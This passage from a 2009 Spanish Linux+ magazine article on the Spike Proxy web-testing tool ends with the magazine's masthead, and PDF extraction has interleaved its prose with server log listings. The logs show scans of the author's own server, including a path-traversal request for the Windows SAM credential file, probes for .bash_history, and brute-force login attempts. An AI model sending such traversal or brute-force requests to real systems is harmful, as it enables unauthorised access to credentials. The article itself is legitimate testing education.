positivos con un ejemplo, veamos un frag-
[01/Feb/2009:19:52:53 +0100]
mento de la conversación entre nuestro proxy
"GET /scripts/tools/newdsn.exe HTTP/1.0" 404 222
y la aplicación web a la que intentamos es-
[01/Feb/2009:19:52:53 +0100]
canear en busca de ficheros comprometidos
"GET /scripts/Carello/Carello.dll HTTP/1.0" 404 225
(Listado 9).
[01/Feb/2009:19:52:53 +0100]
El proxy ha solicitado el fichero .bash_
"GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
history como se ve en el ejemplo, ese archi-
HTTP/1.0" 404 232
vo no está realmente alojado en el servidor,
[01/Feb/2009:19:52:54 +0100]
pero el proxy lo da por encontrado. Como
"GET /scripts/iisadmin/bdir.htr HTTP/1.0" 404 223
vemos, es otro falso positivo. Esto se debe
[01/Feb/2009:19:52:54 +0100]
a que la contestación del sistema web testeado
"GET /scripts/samples/search/author.idq HTTP/1.0" 404 231
ha sido un HTTP/1.1 302 Found, que equivale
[01/Feb/2009:19:52:54 +0100]
a una redirección. Si el mensaje fuera 404 no
"GET /scripts/samples/search/filesize.idq HTTP/1.0" 404 233
tomaría esa respuesta como válida.
[01/Feb/2009:19:52:55 +0100]
El que ciertas páginas web respondan con
"GET /scripts/samples/search/filetime.idq HTTP/1.0" 404 233
un mensaje 302 a la solicitud de un fichero
[01/Feb/2009:19:52:55 +0100]
inesistente es algo muy habitual cuando quere-
"GET /scripts/samples/search/queryhit.idq HTTP/1.0" 404 233
mos redirigir todas las solicitudes erroneas a un
[01/Feb/2009:19:52:55 +0100]
mismo documento que contenga mensaje de
"GET /scripts/samples/search/simple.idq HTTP/1.0" 404 231
error, como es nuestrocaso. En el caso de apli
[01/Feb/2009:19:52:55 +0100]
caciones web que usen dicho método de noti-
"GET /scripts/tools/ctss.idc HTTP/1.0" 404 220
ficación de documentos inexistentes, spike mos-
trará que ha encontrado el 100% de los fiche-

88 Linux+ 4/2009
 práctica
Spike Proxy

Listado 11. BruteForce Password (POST)

En la red
[01/Feb/2009:20:02:21 +0100] "POST /login.php HTTP/1.1" 200 8711
[01/Feb/2009:20:02:21 +0100] "POST /login.php HTTP/1.1" 200 8711 • Página de descarga de la suite Spike:
[01/Feb/2009:20:02:21 +0100] "POST /login.php HTTP/1.1" 200 8711 http://www.immunitysec.com/
[01/Feb/2009:20:02:21 +0100] "POST /login.php HTTP/1.1" 200 8711 resources-freesoftware.shtml
• Página del proyecto Spike Proxy:
Listado 12. BruteForce Password (GET) http://www.immunitysec.com/
• Página del proyecto Odysseus:
[01/Feb/2009:20:04:35 +0100] http://www.bindshell.net/tools/
"GET /login.php?username=username&password=BBBBB HTTP/1.1" 200 8711 odysseus/
[01/Feb/2009:20:04:35 +0100] • Códigos de estado de Http:
"GET /login.php?username=username&password=12345 HTTP/1.1" 200 8711 http://es.wikipedia.org/
[01/Feb/2009:20:04:35 +0100] wiki/Anexo:C%C3%B3digos_
"GET /login.php?username=username&password=B1dfsf2q HTTP/1.1" 200 8711 de_estado_HTTP
[01/Feb/2009:20:04:35 +0100]
"GET /login.php?username=username&password=admin1234 HTTP/1.1" 200 8711

defecto NO registra las variables pasadas

Listado 13. DirScan por el método POST.
• BruteForce Password (GET) (Listado 12).
[01/Feb/2009:20:12:00 +0100] "GET /global.asa HTTP/1.1" 404 208
• DirScan (Listado 13).
[01/Feb/2009:20:12:00 +0100] "GET /ws_ftp.log HTTP/1.1" 404 208
[01/Feb/2009:20:12:00 +0100] "GET /.bash_history HTTP/1.1" 404 211
Conclusiones
[01/Feb/2009:20:12:00 +0100] "GET /.private HTTP/1.1" 404 206
Como vemos, Spike proxy es una aplicación
[01/Feb/2009:20:12:00 +0100] "GET /template.xsl HTTP/1.1" 404 210
fácil de usar y muy útil para testear proyectos
[01/Feb/2009:20:12:00 +0100] "GET /include.asp HTTP/1.1" 404 209
web, pudiendo realizar con ella un sinfin de
pruebas con el objetivo de comprobar que las
ros vulnerables que ha intentado encontrar. • VulnXML Tests (Listado 10). páginas contestan a las solicitudes como de-
Algunos ejemplos de logs que podemos ver en • BruteForce Password (POST) (Listado bería o sin por el contrario muestran algunas
nuestro servidor al usar spike: 11). Nota: Recordemos que Apache por debilidades o fallas que debamos corregir.

PUBLICIDAD

www.lpmagazine.org 89
 El tema principal del siguiente número de Linux+ será:

Linux en la empresa

El próximo número incluirá los siguientes artículos:

• Reducción de costes de software gracias

a Software Libre: ¿un mito?
• Google en la empresa
• Aplicaciones de Internet Enriquecidas (RIA):
Programando RIA con Flex y AMFPHP
• Rehosting de sistemas VAX/OpenVMS
en sistemas GNU/Linux

La Redacción se reserva derecho a modificar sus planes

Mensual Linux+ está publicado Diseño portada: La Redacción se ha esforzado para que el material publicado en la
por Software-Wydawnictwo Sp. z o. o. Agnieszka Marchocka revista y en los DVDs que la acompañan funcionen correctamente.
Gráfico: Sin embargo, no se responsabiliza de los posibles problemas que
Producción: Łukasz Pabian – "insane" puedan surgir.
Marta Kurpiewska, marta@software.com.pl Publicidad:
Product Manager adv@software.com.pl Todas las marcas comerciales mencionadas en la revista son
Paulina Pyrowicz, paulina.pyrowicz@software.com.pl Suscripción: propiedad de las empresas correspondientes y han sido usadas
Redactora jefe: suscripcion@software.com.pl únicamente con fines informativos.
Aleksandra Tęsiorowska, a.tesiorowska@lpmagazine.org
Colaboradores: La Redacción usa el sistema de composición
Francisco Javier Carazo Gil, José Carlos Cortizo Pérez, automática
David Puente Castro, Jorge Emanuel Capurro Distribución:
Coedis, S. L. Los DVDs incluidos en la revista han sido comprobados con
Correctores: Avd. Barcelona, 225 el programa AntiVirenKit, producto de la empresa
Pablo Cardozo 08750 Molins de Rei (Barcelona), G Data Software Sp. z o.o.
España
Preparación de DVDs: ¡Advertencia!
Ireneusz Pogroszewski, Andrzej Kuca Dirección: Queda prohibida la reproducción total o parcial de esta ublicación
Software–Wydawnictwo Sp. z o.o., periódica, por cualquier medio o procedimiento, sin para ello
DTP: ul. Bokserska 1, contar con la autorización previa, expresa y por escrito del editor.
Marcin Ziółkowski 02-682 Varsovia,
Graphics & Design Studio, www.gdstudio.pl Polonia Linux ® es una marca comercial registrada de Linus Torvalds.